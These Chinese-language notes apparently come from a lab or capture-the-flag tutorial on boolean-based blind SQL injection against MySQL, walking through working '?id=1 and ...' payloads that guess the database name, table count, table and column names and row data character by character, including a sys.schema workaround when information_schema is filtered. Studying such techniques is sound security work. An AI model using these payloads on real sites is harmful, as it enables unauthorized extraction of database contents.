常用函数
-
substr(str,from,length)
返回从下标为from截取长度为length的str子串。其中,首字符下标为1 -
length(str)
返回字符串长度 -
ASCII(char)
返回char的ascii码,常与substr一起使用
注入步骤
输入id以查询 查询成功返回 s u c c e s s \color{#00FF00}{success} success 失败返回 e r r o r \color{#FF0000}{error} error
1. 爆数据库名称长度
?id=1 and length(database())=i
#i 为猜测长度
2.爆库名
?id=1 and substr(database(),j,1)=‘a’
...
?id=1 and substr(database(),j,1)=‘z’
#猜出每位字母后 j 每次步长1向后移动直到数据库长度 i
3.确定当前库中表的个数
?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=k
#k 为表张数,共k张表
当information_schema被过滤时使用sys.schema
- 在mysql 5.7中新增了sys.schema,基础数据来自于performance_chema和information_schema两个库,本身数据库不存储数据
?id=1 and (select COUNT(*) from sys.schema_auto_increment_columns where table_schema=database())=k
#或者
?id=1 and (select COUNT(*) from sys.schema_table_statistics_with_buffer where table_schema=database())=k
4.爆表名长度
?id=1 and (select length(table_name)from information_schema.tables where table_schema=database() limit 0,1)=m
#表名长度为m
#取出从第0个开始的一张表
- limit使用
limit a,b 从a开始的b项,共b项
5.爆表名
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘a’
...
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),m,1)=‘z’
其他表同理
6.爆表项个数
?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name='table_name')=n
#共n项
7.爆表项长度
?id=1 and (select length(column_name) from information_schema.columns where table_name='table_name')=v
#表项为v
8.爆表项
?id=1 and substr((select column_name from information_schema.columns where table_name='table_name' limit 0,1),1,1)='a'
...
?id=1 and substr((select column_name from information_schema.columns where table_name='table_name' limit 0,1),1,1)='z'
9.爆数据
?id=1 and substr((select column_name from table_name),1,1)='a'
...
?id=1 and substr((select column_name from table_name),1,1)='z'